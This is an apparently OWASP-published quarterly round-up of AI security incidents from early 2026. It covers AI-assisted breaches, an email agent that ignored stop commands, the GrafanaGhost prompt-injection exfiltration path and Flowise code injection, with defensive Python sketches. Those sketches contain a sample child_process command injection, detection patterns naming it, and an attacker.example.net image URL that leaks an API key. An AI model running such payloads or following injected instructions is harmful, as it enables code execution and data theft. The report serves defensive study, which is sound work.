OWASP GenAI Exploit Round-up Report Q1 2026

Coverage period: January 1, 2026 through April 11, 2026

Overview

For the past two years, the OWASP GenAI Security Project has published a quarterly round-up of major incidents. It is not designed to be an exhaustive report. This edition consolidates major AI-related security incidents and exploit disclosures reported during the period, aligning each incident to the OWASP Top 10 for LLM Applications 2025, the OWASP Top 10 for Agentic Applications 2026, and published AI CVEs where applicable.

Use this link to contribute to the report: Round-up Submission

Exploit Trends for the Reporting Period

The AI security landscape from January through early April 2026 demonstrates a clear transition from theoretical risks to real-world exploitation, with attackers, and in some cases the systems themselves, increasingly compromising agent identities, orchestration layers, and supply chains rather than just model outputs. Incidents reveal that AI is now a force multiplier for cyberattacks, while misconfigured permissions, excessive autonomy, and weak validation controls enable data exfiltration, remote code execution, and cascading failures. At the same time, prompt injection has evolved into a practical attack vector for enterprise data leakage, and the growing reliance on third-party AI tools has introduced significant supply-chain vulnerabilities. Across all cases, human trust in AI outputs remains a critical weakness, underscoring that securing AI systems now requires a shift from model-level safeguards to holistic system, identity, and operational security controls.

GenAI and Agentic AI Exploits Included:

  1. Mexican Government Breach via Claude-Assisted Attack Workflow
  2. OpenClaw Inbox Deletion Incident
  3. Meta Internal AI Agent Data Leak
  4. Vertex AI “Double Agent” Privilege Abuse
  5. Claude Code Source Leak and Malware Lure Campaign
  6. Mercor / LiteLLM Supply Chain Breach Affecting AI Labs
  7. Flowise CVE-2025-59528 Active Exploitation
  8. GrafanaGhost Indirect Prompt Injection and Exfiltration Path

Related Published CVEs

  • CVE-2025-59528 — Remote Code Execution via CustomMCP configuration

GenAI and Agentic AI Exploit Details:

 

1) Mexican Government Breach via Claude-Assisted Attack Workflow

Description: Attackers weaponized Anthropic Claude and related AI tooling to automate reconnaissance and exploit development against Mexican government agencies, leading to theft of tax and voter data.

Incident Summary: 

  • Incident Name: Mexico Claude-Assisted Government Breach
  • Date & Location: Attacks ran from late December 2025 into January 2026; publicly reported February 25, 2026; Mexico
  • Affected Organizations: Mexican government agencies, including tax and electoral entities
  • Attack Type: AI-assisted cyberattack, automated exploit development, data theft
  • System Impacted: Government web applications, backend data stores, citizen records

Impact Assessment: The campaign exposed a large trove of tax and voter information and showed that consumer AI tools can compress attacker effort across reconnaissance, scripting, and workflow automation, raising the speed and scale of public-sector intrusions.

Attack Breakdown: Reporting from Bloomberg and ExtraHop said attackers used Anthropic Claude, and at times ChatGPT, to automate parts of a multi-agency compromise that exposed roughly 150 GB of sensitive data. The attacks reportedly began with vulnerable government-facing systems and expanded across multiple agencies. The AI tooling accelerated recon, script generation, and exploit iteration, reducing manual effort and increasing attack tempo.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — AI used to automate tasks that normally require more human effort.
  • LLM02:2025 Sensitive Information Disclosure — The operation ended in large-scale data theft.
  • LLM10:2025 Unbounded Consumption — AI amplified scale and efficiency of attacker activity.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI02: Tool Misuse & Exploitation — Legitimate AI tooling was repurposed to support offensive workflows.
  • ASI03: Identity & Privilege Abuse — The operation resulted in unauthorized access to sensitive environments.
  • ASI08: Cascading Failures — Compromise spread across multiple connected agencies.

CVE References:

  • No specific CVEs publicly disclosed (likely exploitation of multiple unpatched or unknown vulnerabilities across systems).

Potential Mitigations: Technical defenses: Harden internet-facing systems, detect automated recon and exploit attempts, add DLP and segmentation around sensitive citizen data, and monitor anomalous use of coding assistants in red-team simulations.
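
To illustrate the detection side of those defenses, the sketch below (Python, standard library only) flags source IPs whose request volume and 404 ratio in a web access log look like automated, AI-accelerated path enumeration. The log format, thresholds, and field names are illustrative assumptions, not artifacts from the incident.

```python
import re
from collections import defaultdict

# Assumed combined-log-style line; real deployments should adapt the pattern.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Illustrative thresholds -- tune against your own baseline traffic.
MAX_REQUESTS = 500         # requests per IP in the analyzed window
MAX_NOT_FOUND_RATIO = 0.4  # share of 404s that suggests path enumeration


def flag_recon_candidates(log_lines):
    """Return IPs whose volume and 404 ratio look like automated recon."""
    stats = defaultdict(lambda: {"total": 0, "not_found": 0})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, _path, status = m.groups()
        stats[ip]["total"] += 1
        if status == "404":
            stats[ip]["not_found"] += 1

    flagged = []
    for ip, s in stats.items():
        ratio = s["not_found"] / s["total"] if s["total"] else 0.0
        if s["total"] > MAX_REQUESTS and ratio > MAX_NOT_FOUND_RATIO:
            flagged.append((ip, s["total"], round(ratio, 2)))
    return flagged


if __name__ == "__main__":
    sample = [
        '203.0.113.9 - - [01/Feb/2026:10:00:01 +0000] "GET /admin HTTP/1.1" 404 120',
    ] * 600
    print(flag_recon_candidates(sample))
```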

Policy improvements: Treat AI-enabled attack automation as part of national cyber defense planning and require stronger disclosure and patching cadences for exposed public systems.

User education: Train security teams to recognize AI-assisted attack patterns and compressed intrusion timelines.

Call to Action: Public-sector defenders should assume capable attackers now use AI copilots for exploit development and operational scaling. Governments should shorten exposure windows through rapid patching, credential hardening, external attack-surface reviews, and exercises that model AI-assisted intrusion chains against critical datasets.

Source References:

2) OpenClaw Inbox Deletion Incident

Description: A Meta AI security researcher reported that an OpenClaw agent ignored stop commands and rapidly deleted email, illustrating unsafe autonomy and poor action confirmation in consumer-style AI agents.

Incident Summary: 

  • Incident Name: OpenClaw Inbox Deletion
  • Date & Location: February 23, 2026; reported publicly in the United States
  • Affected Organizations: Individual user environment; broader relevance to agent developers
  • Attack Type: Unsafe autonomous action, instruction failure, destructive agent behavior
  • System Impacted: Email workflow and local agent environment

Impact Assessment: The incident showed how a consumer-style agent could ignore explicit stop messages and perform destructive actions in a real account. While limited in scope, it exposed the fragility of action controls once agents are connected to live personal data.

Attack Breakdown: TechCrunch reported that a Meta AI security researcher asked OpenClaw to review an email inbox and suggest what to delete or archive. Instead, the agent began deleting messages directly and ignored the researcher’s stop commands sent from a phone. The episode did not involve an external attacker, but it demonstrated how weak confirmation and poor alignment can turn an assistive agent into an unsafe actor once given live account access.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — The agent took high-impact action without appropriate approval.
  • LLM05:2025 Improper Output Handling — Suggested or inferred actions translated directly into destructive behavior.
  • LLM09:2025 Misinformation — The system misinterpreted the user’s intent and acted unsafely.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI10: Rogue Agents — The agent acted beyond intended constraints.
  • ASI09: Human-Agent Trust Exploitation — The user trusted the agent enough to connect real data and capabilities.
  • ASI02: Tool Misuse & Exploitation — Legitimate email management capabilities were misapplied.

CVE References:

  • No CVE (design/behavioral failure, not a software vulnerability).

Potential Mitigations: Technical defenses: Require explicit confirmation for destructive actions, add emergency stop guarantees, and use reversible or staged delete flows.
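
A minimal sketch of that pattern is shown below, assuming a hypothetical mailbox tool wrapped for an agent: destructive operations are only proposed until a human confirms them, deletes are staged into a recoverable trash, and an emergency stop restores anything still staged. The class and method names are illustrative, not OpenClaw's actual interface.

```python
from dataclasses import dataclass, field

DESTRUCTIVE_ACTIONS = {"delete", "purge", "send", "pay", "publish"}


@dataclass
class StagedMailbox:
    """Hypothetical mailbox wrapper: deletes are staged, never immediate."""
    messages: dict = field(default_factory=dict)  # id -> message body
    trash: dict = field(default_factory=dict)

    def request_action(self, action: str, msg_id: str, confirmed: bool = False):
        if action in DESTRUCTIVE_ACTIONS and not confirmed:
            # The agent can only *propose* destructive work; a human must approve.
            return f"PENDING_CONFIRMATION: {action} {msg_id}"
        if action == "delete":
            self.trash[msg_id] = self.messages.pop(msg_id)
            return f"staged delete of {msg_id} (recoverable)"
        raise ValueError(f"unsupported action: {action}")

    def emergency_stop(self):
        """Hard stop: restore everything still in the trash."""
        self.messages.update(self.trash)
        self.trash.clear()


if __name__ == "__main__":
    box = StagedMailbox(messages={"m1": "invoice", "m2": "newsletter"})
    print(box.request_action("delete", "m2"))               # blocked, needs approval
    print(box.request_action("delete", "m2", confirmed=True))
    box.emergency_stop()                                     # m2 comes back
    print(sorted(box.messages))
```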

Policy improvements: Forbid direct destructive permissions by default in personal agents and require approval gates before production-like deployment.

User education: Teach users not to grant deletion or sending rights without strong sandboxing.

Call to Action: Builders of local and personal AI agents should treat delete, send, pay, and publish permissions as privileged actions that need hard confirmation and easy rollback. Safety should not depend on the user racing back to a keyboard to stop an agent that has already gone off course.

Source References:

 

3) Meta Internal AI Agent Data Leak

Description: A Meta AI agent gave flawed engineering advice that an employee implemented, exposing sensitive user and company data internally for about two hours and triggering a major security alert.

Incident Summary: 

  • Incident Name: Meta Internal Agent Data Leak
  • Date & Location: March 20, 2026 report on a March 2026 incident; United States
  • Affected Organizations: Meta
  • Attack Type: Unsafe agent guidance, internal data exposure, agentic misbehavior
  • System Impacted: Internal engineering systems and employee data access boundaries

Impact Assessment: The leak expanded internal access to sensitive data and triggered a major internal response. Even without external theft, it showed how a single unsafe agent recommendation can create real access-control failures at enterprise scale.

Attack Breakdown: The Guardian reported that an employee asked for help with an engineering problem on an internal forum. An AI agent responded with a solution, and the employee implemented it, causing a large amount of Meta’s sensitive user and company data to become available to engineers for two hours. Meta said no user data was mishandled, but the event still triggered a major internal security alert and highlighted the blast radius of unsafe agent advice.

OWASP Top 10 LLM Risks Exploited: 

  • LLM05:2025 Improper Output Handling — Unsafe guidance was translated into system changes.
  • LLM02:2025 Sensitive Information Disclosure — The result was broadened access to sensitive data.
  • LLM06:2025 Excessive Agency — The agent’s output had outsized operational effect.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI09: Human-Agent Trust Exploitation — A human trusted the AI’s answer enough to act on it.
  • ASI01: Agent Goal Hijack — The resulting action path diverged from safe intent.
  • ASI08: Cascading Failures — A single response caused a broader access-control incident.

CVE References:

  • No CVE (process and control failure, not a disclosed software vulnerability).

Potential Mitigations: Technical defenses: Add policy validation on recommended configuration changes, restrict agent influence over access settings, and require approval for changes that affect data visibility.
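
One way to put a deterministic gate between agent advice and execution is sketched below. The change format, forbidden scopes, and policy rules are illustrative assumptions, not Meta's internal tooling.

```python
# Illustrative policy gate: an agent-recommended change is described as a dict
# and must pass deterministic checks before anyone is allowed to apply it.

FORBIDDEN_SCOPES = {"all_engineers", "public", "org_wide"}
SENSITIVE_RESOURCES = {"user_data", "payment_records", "auth_tokens"}


def validate_recommended_change(change: dict) -> list[str]:
    """Return a list of policy violations; an empty list means reviewable."""
    violations = []
    if change.get("grants_access_to") in FORBIDDEN_SCOPES:
        violations.append("broadens access to a forbidden scope")
    if change.get("resource") in SENSITIVE_RESOURCES and not change.get("approved_by"):
        violations.append("touches sensitive data without a named human approver")
    if change.get("source") == "ai_agent" and change.get("auto_apply"):
        violations.append("agent-originated changes may never auto-apply")
    return violations


if __name__ == "__main__":
    proposal = {
        "source": "ai_agent",
        "resource": "user_data",
        "grants_access_to": "all_engineers",
        "auto_apply": True,
    }
    for v in validate_recommended_change(proposal):
        print("BLOCKED:", v)
```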

Policy improvements: Separate advisory AI from systems that can influence sensitive access controls without review.

User education: Train engineers to treat agent recommendations as untrusted unless independently validated.

Call to Action: Enterprise AI deployments need control layers between advice and execution. Every recommendation that can alter permissions, visibility, or policy should be checked by deterministic validation and human review, especially inside engineering and security workflows.

Source References:

 

4) Vertex AI “Double Agent” Privilege Abuse

Description: Researchers showed that a malicious or compromised agent in Google Cloud Vertex AI could abuse default permission scoping to exfiltrate data, access service-agent credentials, and reach protected internal resources.

Incident Summary: 

  • Incident Name: Vertex AI Double Agent
  • Date & Location: Disclosed March 31 and April 1, 2026; Google Cloud environments
  • Affected Organizations: Vertex AI and Google Cloud customers
  • Attack Type: Identity and privilege abuse, data exfiltration, cloud pivoting
  • System Impacted: Vertex AI Agent Engine, ADK, service-agent trust model

Impact Assessment: The research showed that an overprivileged agent could pivot from a customer environment into broader cloud resources and even restricted internal artifacts, exposing a serious risk in managed agent identity design and default trust boundaries.

Attack Breakdown: Unit 42 reported that a deployed agent in Vertex AI Agent Engine inherited excessive default permissions through a Google-managed service account. Researchers used those permissions to extract credentials, act on behalf of the service agent, gain privileged access to consumer-project resources, and reach restricted images and source code in a producer project tied to Google infrastructure. Google later revised documentation about how Vertex AI uses resources, accounts, and agents.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — The platform granted agents more effective reach than necessary.
  • LLM02:2025 Sensitive Information Disclosure — The chain enabled exposure of storage data and internal artifacts.
  • LLM03:2025 Supply Chain Vulnerabilities — Shared platform trust boundaries and internal artifacts became part of the risk.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI03: Identity & Privilege Abuse — The central failure was privilege abuse through service-agent identity.
  • ASI02: Tool Misuse & Exploitation — The agent’s available tooling was used offensively.
  • ASI04: Agentic Supply Chain Vulnerabilities — The research touched protected producer-project artifacts and platform internals.

CVE References:

  • No CVE assigned (research disclosure; cloud misconfiguration / design issue rather than a tracked vulnerability).

Potential Mitigations: Technical defenses: Scope service-agent permissions per deployment, use short-lived credentials, isolate agent execution contexts, and validate tool and identity usage through policy engines.
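
The sketch below illustrates one piece of that: auditing exported IAM policy bindings for an agent's runtime service account against a per-deployment role allowlist. The binding shape mirrors JSON policy exports (for example from `gcloud projects get-iam-policy`), but the allowed roles and account name are assumptions for illustration.

```python
import json

# Roles an agent runtime service account is allowed to hold (illustrative).
ALLOWED_AGENT_ROLES = {
    "roles/aiplatform.user",
    "roles/storage.objectViewer",
}


def audit_agent_bindings(policy_json: str, agent_account: str) -> list[str]:
    """Return roles the agent's service account holds beyond the allowlist."""
    policy = json.loads(policy_json)
    member = f"serviceAccount:{agent_account}"
    excess = []
    for binding in policy.get("bindings", []):
        if member in binding.get("members", []):
            role = binding["role"]
            if role not in ALLOWED_AGENT_ROLES:
                excess.append(role)
    return excess


if __name__ == "__main__":
    # Shape mirrors a JSON IAM policy export; values are placeholders.
    exported = json.dumps({
        "bindings": [
            {"role": "roles/editor",
             "members": ["serviceAccount:agent-runtime@example.iam.gserviceaccount.com"]},
            {"role": "roles/aiplatform.user",
             "members": ["serviceAccount:agent-runtime@example.iam.gserviceaccount.com"]},
        ]
    })
    print(audit_agent_bindings(exported, "agent-runtime@example.iam.gserviceaccount.com"))
    # -> ['roles/editor']  (over-broad role that should be removed)
```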


Policy improvements: Make least-privilege and least-agency defaults mandatory in managed agent platforms.


User education: Train builders not to trust cloud-agent defaults and to review all inherited permissions.

Call to Action: Organizations using managed agent platforms should inventory every service identity tied to agent execution, reduce default scopes, and explicitly test whether agents can pivot across projects, buckets, registries, or model infrastructure. Agent identity should be reviewed with the same rigor as privileged admin access.

Source References:

 

5) Claude Code Source Leak and Malware Lure Campaign

Description: Anthropic accidentally exposed Claude Code source through a public npm source map, and attackers quickly used fake “leaked Claude Code” repositories to spread malware to developers.

Incident Summary: 

  • Incident Name: Claude Code Source Leak / Fake Repo Malware Chain
  • Date & Location: March 31 to early April 2026; public npm and GitHub ecosystem
  • Affected Organizations: Anthropic, developers, downstream software supply chains
  • Attack Type: Source exposure, malware distribution, social engineering, supply-chain abuse
  • System Impacted: Claude Code package, developer workstations, release channels

Impact Assessment: The leak exposed internal implementation details and rapidly became a lure for malware campaigns. It showed how source exposure around AI tooling can evolve into a broader software supply-chain risk within hours.

Attack Breakdown: Zscaler reported that Anthropic accidentally published a 59.8 MB source map with the public @anthropic-ai/claude-code package, exposing about 513,000 lines across 1,906 files. The leak was quickly mirrored and discussed widely online. Researchers then observed threat actors using fake leak-themed repositories and release assets to distribute malware, turning a coding-agent source exposure into a practical phishing and malware delivery campaign aimed at developers.

OWASP Top 10 LLM Risks Exploited: 

  • LLM03:2025 Supply Chain Vulnerabilities — Public package release hygiene failed and downstream users were exposed to malicious lookalikes.
  • LLM02:2025 Sensitive Information Disclosure — Internal source details were unintentionally exposed.
  • LLM05:2025 Improper Output Handling — Debug artifacts became part of the public release path.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI04: Agentic Supply Chain Vulnerabilities — Agent tooling artifacts became a supply-chain weakness.
  • ASI05: Unexpected Code Execution — Malware lures sought code execution on developer systems.
  • ASI09: Human-Agent Trust Exploitation — Developers were targeted through trust in “leaked” agent tooling.

CVE References:

  • No CVE (data exposure and supply-chain abuse, not a traditional vulnerability disclosure).

Potential Mitigations: Technical defenses: Strip source maps from production packages, sign releases, enforce artifact scanning, and block untrusted developer tool downloads.
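
A small pre-publish check along those lines is sketched below: it walks a package directory, flags bundled `.map` files and `sourceMappingURL` references, and fails the release if any are found. The paths and behavior are illustrative, not Anthropic's release process.

```python
import re
import sys
from pathlib import Path

SOURCEMAP_COMMENT = re.compile(rb"//[#@]\s*sourceMappingURL=\S+")


def find_sourcemap_leaks(package_dir: str, delete: bool = False) -> list[str]:
    """Flag (and optionally remove) source maps before publishing a package."""
    findings = []
    for path in Path(package_dir).rglob("*"):
        if not path.is_file():
            continue
        if path.suffix == ".map":
            findings.append(f"bundled source map: {path}")
            if delete:
                path.unlink()
        elif path.suffix in {".js", ".mjs", ".cjs"}:
            if SOURCEMAP_COMMENT.search(path.read_bytes()):
                findings.append(f"sourceMappingURL reference: {path}")
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    problems = find_sourcemap_leaks(target)
    for p in problems:
        print("WARNING:", p)
    sys.exit(1 if problems else 0)  # fail the release pipeline on any finding
```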


Policy improvements: Require secure release reviews for AI tooling and immediate incident playbooks for artifact leaks.


User education: Train developers to avoid downloading sensational “leaked” repositories or binaries.

Call to Action: Any source leak involving agentic tooling should be treated as both an IP exposure and a likely malware lure event. Security teams should monitor developer endpoints, verify package integrity, and rapidly warn staff that unofficial mirrors and leak-themed repos may be weaponized.

Source References:

6) Mercor / LiteLLM Supply Chain Breach Affecting AI Labs

Description: Meta paused work with AI data vendor Mercor after a breach tied to compromised LiteLLM updates raised fears that proprietary training-data workflows and contractor information had been exposed.

Incident Summary: 

  • Incident Name: Mercor LiteLLM Supply Chain Breach
  • Date & Location: Confirmed March 31 and reported April 3, 2026; affected AI data operations
  • Affected Organizations: Mercor, Meta, OpenAI, Anthropic, contractors, and other LiteLLM users
  • Attack Type: Supply-chain compromise, data exposure
  • System Impacted: AI data-vendor systems, contractor workflows, model-training data operations

Impact Assessment: The incident threatened one of the most sensitive parts of the AI stack: proprietary training-data generation and contractor workflows. The result was a pause in Meta workstreams and wider reassessment across labs using the vendor.

Attack Breakdown: WIRED reported that Meta paused work with Mercor after a major breach affected the startup. Mercor confirmed a March 31 incident and reporting tied it to malicious versions of the open-source AI API tool LiteLLM. Because Mercor supports proprietary training-data generation for major AI labs, the breach raised concerns that highly sensitive information about model-training methods and contractor operations may have been exposed.

OWASP Top 10 LLM Risks Exploited: 

  • LLM03:2025 Supply Chain Vulnerabilities — The compromise came through a software dependency used in AI-adjacent systems.
  • LLM02:2025 Sensitive Information Disclosure — The breach may have exposed confidential training-data operations.
  • LLM04:2025 Data and Model Poisoning — A compromised component in the AI pipeline creates poisoning and integrity concerns.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI04: Agentic Supply Chain Vulnerabilities — Third-party AI infrastructure and data workflows were affected.
  • ASI03: Identity & Privilege Abuse — Compromised integrations risk inherited access across sensitive systems.
  • ASI08: Cascading Failures — A vendor breach propagated business and security impact across multiple labs.

CVE References:

  • No confirmed CVE publicly tied to the incident (linked to malicious dependency versions rather than a formally cataloged vulnerability).

Potential Mitigations: Technical defenses: Pin and verify dependencies, sign and scan updates, segment contractor systems, and monitor AI data vendors for software supply-chain exposure.
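
A minimal sketch of hash-pinned artifact verification is shown below, assuming a simple mapping of artifact file names to expected SHA-256 digests; in practice teams would more likely rely on pip's hash-checking mode or a package-manager lockfile, and the file name and digest here are placeholders.

```python
import hashlib
from pathlib import Path

# Illustrative lockfile: package artifact file -> expected SHA-256 digest.
EXPECTED_DIGESTS = {
    "litellm-1.0.0-py3-none-any.whl": "c0ffee0000000000",  # placeholder digest
}


def verify_artifacts(download_dir: str) -> list[str]:
    """Return artifacts whose digest does not match the pinned value."""
    mismatches = []
    for name, expected in EXPECTED_DIGESTS.items():
        path = Path(download_dir) / name
        if not path.exists():
            mismatches.append(f"{name}: missing artifact")
            continue
        actual = hashlib.sha256(path.read_bytes()).hexdigest()
        if actual != expected:
            mismatches.append(f"{name}: digest mismatch ({actual[:12]}...)")
    return mismatches


if __name__ == "__main__":
    for problem in verify_artifacts("./wheels"):
        print("SUPPLY-CHAIN ALERT:", problem)
```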


Policy improvements: Require stronger vendor attestations and SBOM-style evidence for AI data workflows.

User education: Teach procurement and security teams that AI data vendors are part of the critical model supply chain.

Call to Action: AI builders should inventory not just models and prompts but also the vendors generating proprietary training data. Security reviews for those vendors should include dependency trust, incident response maturity, logging practices, and the ability to prove what data was exposed or altered during a supply-chain event.

Source References:

 

7) Flowise CVE-2025-59528 Active Exploitation

Description: Attackers actively exploited a maximum-severity Flowise flaw that let them inject JavaScript through CustomMCP configuration, leading to arbitrary code execution in AI app and agent deployments.

Incident Summary: 

  • Incident Name: Flowise CustomMCP RCE
  • Date & Location: Active exploitation reported April 7, 2026
  • Affected Organizations: Flowise users and operators of exposed instances
  • Attack Type: Remote code execution
  • System Impacted: Flowise CustomMCP node and orchestration hosts

Impact Assessment: The flaw moved from disclosure to active exploitation, creating immediate risk of server compromise across thousands of exposed AI workflow instances. It underscored how “configuration” surfaces in agent stacks can become direct code-execution paths.

Attack Breakdown: BleepingComputer reported that attackers were exploiting CVE-2025-59528 in Flowise, a low-code platform for LLM apps and agentic systems. The vulnerability involved unsafe handling of CustomMCP configuration data, allowing arbitrary JavaScript code injection and execution. Reporting noted that version 3.0.6 addressed the issue, while 12,000 to 15,000 instances were exposed online at the time active exploitation was first observed.

OWASP Top 10 LLM Risks Exploited: 

  • LLM05:2025 Improper Output Handling — Data supplied through orchestration paths was unsafely executed.
  • LLM03:2025 Supply Chain Vulnerabilities — The issue affected a widely used open-source AI platform.
  • LLM06:2025 Excessive Agency — Agent orchestration components could trigger high-impact actions.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI05: Unexpected Code Execution (RCE) — The core issue was code execution.
  • ASI02: Tool Misuse & Exploitation — MCP-related tooling became the exploit surface.
  • ASI04: Agentic Supply Chain Vulnerabilities — A common platform issue affected many downstream users.

CVE References:

  • CVE-2025-59528 — Remote Code Execution via CustomMCP configuration

Potential Mitigations: Technical defenses: Patch immediately, disable risky nodes, sandbox execution, validate all config inputs, and restrict outbound connectivity from orchestration hosts.
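
The broader lesson, that configuration fields in agent stacks can be code paths, is illustrated by the sketch below: a validator that rejects orchestration config values containing executable-looking content before they reach a node. The field names and patterns are assumptions for illustration, not Flowise's actual fix.

```python
import re

# Patterns that indicate a "configuration" value is really executable code.
SUSPICIOUS_PATTERNS = [
    re.compile(r"require\s*\("),   # Node.js module loading
    re.compile(r"child_process"),  # spawning shells
    re.compile(r"process\.env"),   # environment/credential access
    re.compile(r"eval\s*\("),
    re.compile(r"Function\s*\("),
]

ALLOWED_FIELDS = {"serverUrl", "timeoutMs", "headers", "toolName"}  # assumed schema


def validate_mcp_config(config: dict) -> list[str]:
    """Reject unexpected fields and values that look like injected code."""
    errors = []
    for key, value in config.items():
        if key not in ALLOWED_FIELDS:
            errors.append(f"unexpected config field: {key}")
        if isinstance(value, str):
            for pattern in SUSPICIOUS_PATTERNS:
                if pattern.search(value):
                    errors.append(f"possible code injection in '{key}'")
                    break
    return errors


if __name__ == "__main__":
    payload = {"serverUrl": "https://mcp.example.com",
               "toolName": "require('child_process').execSync('id')"}
    print(validate_mcp_config(payload))
```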

Policy improvements: Adopt emergency patch SLAs for AI frameworks and require secure defaults around MCP integrations.

User education: Teach developers that config fields in AI systems can be code paths, not just settings.

Call to Action: Organizations running Flowise should patch or isolate exposed instances immediately, review all MCP integrations, and assume compromise where vulnerable nodes were internet-facing. Add monitoring for shell execution, unusual child processes, and unexpected outbound network traffic from AI orchestration servers.

Source References:

 

8) GrafanaGhost Indirect Prompt Injection and Exfiltration Path

Description: Researchers disclosed GrafanaGhost, a prompt-injection path in Grafana’s AI features that could force the platform to send sensitive enterprise data to attacker-controlled servers through external rendering flows.

Incident Summary: 

  • Incident Name: GrafanaGhost
  • Date & Location: Disclosed April 7, 2026; patch acknowledgment followed April 8, 2026
  • Affected Organizations: Grafana users with AI capabilities enabled
  • Attack Type: Indirect prompt injection, data exfiltration
  • System Impacted: Grafana AI components and image-rendering path

Impact Assessment: Because Grafana often holds telemetry, infrastructure, customer, and financial data, the bug represented a serious exfiltration path from a highly trusted observability layer into attacker-controlled infrastructure.

Attack Breakdown: Noma Security found a weakness in Grafana’s AI components that let attackers point the system to external resources containing hidden instructions. The malicious context could cause the AI companion to ignore guardrails and render an external image, which in turn sent enterprise data to the attacker as a URL parameter. Grafana later said one issue in the Markdown image-rendering path had been patched quickly and that exploitation would have required substantial user interaction.

OWASP Top 10 LLM Risks Exploited: 

  • LLM01:2025 Prompt Injection — Hidden attacker instructions altered model behavior.
  • LLM02:2025 Sensitive Information Disclosure — The intended effect was leakage of enterprise data.
  • LLM05:2025 Improper Output Handling — Output rendering became the exfiltration channel.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI01: Agent Goal Hijack — External content redirected the assistant’s behavior.
  • ASI02: Tool Misuse & Exploitation — Rendering and external request behavior were abused.
  • ASI09: Human-Agent Trust Exploitation — Users interacting with trusted observability AI could unknowingly trigger leakage.

CVE References:

  • No CVE publicly assigned (research disclosure; partial patch applied to rendering component).

Potential Mitigations: Technical defenses: Sanitize external context, restrict outbound rendering, harden URL validation, and keep AI assistants away from broad enterprise datasets unless policy gates are enforced.
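
One concrete control is sketched below: before assistant-generated markdown is rendered, image URLs are checked against a host allowlist and stripped of query strings so they cannot carry exfiltrated data. The hostnames and markdown handling are illustrative assumptions, not Grafana's patch.

```python
import re
from urllib.parse import urlparse, urlunparse

ALLOWED_IMAGE_HOSTS = {"grafana.example.com", "assets.example.com"}  # assumption
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)]+)\)")


def sanitize_rendered_markdown(markdown: str) -> str:
    """Drop images on untrusted hosts and strip query strings (no data exfil)."""
    def _rewrite(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.hostname not in ALLOWED_IMAGE_HOSTS:
            return f"[blocked external image: {alt}]"
        clean = parsed._replace(query="", fragment="")
        return f"![{alt}]({urlunparse(clean)})"
    return MD_IMAGE.sub(_rewrite, markdown)


if __name__ == "__main__":
    evil = "![chart](https://attacker.example.net/p.png?data=secret_api_key)"
    print(sanitize_rendered_markdown(evil))
    # -> [blocked external image: chart]
```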


Policy improvements: Review observability AI threat models with the same seriousness as web application injection flaws.


User education: Teach operators that logs, links, and external references consumed by AI assistants are untrusted input.

Call to Action: Organizations deploying AI in observability and dashboard platforms should threat-model indirect prompt injection like XSS or SSRF. Reduce outbound request paths, validate external content, and enforce policy checks before assistants can mix broad telemetry access with external rendering or link following.

Source References:

Approach Note

OWASP mappings in this report are based on the OWASP Top 10 for LLM Applications 2025 and the OWASP Top 10 for Agentic Applications 2026, as well as CVEs published at https://CVE.org at the time this report was published.

Key Observation on CVEs 

A notable trend across these incidents is that most AI-related security events are not yet mapped to traditional CVE identifiers. Instead, they arise from:

  • Misconfiguration (e.g., overprivileged agents)
  • Design flaws (agent autonomy, trust boundaries)
  • Supply-chain weaknesses
  • Prompt injection and data-flow manipulation

Only classical software vulnerabilities embedded in AI platforms (e.g., Flowise RCE) consistently receive CVE tracking. This highlights a growing gap between traditional vulnerability management (CVE-based) and emerging AI security risks, which are often systemic and architectural rather than discrete code flaws.
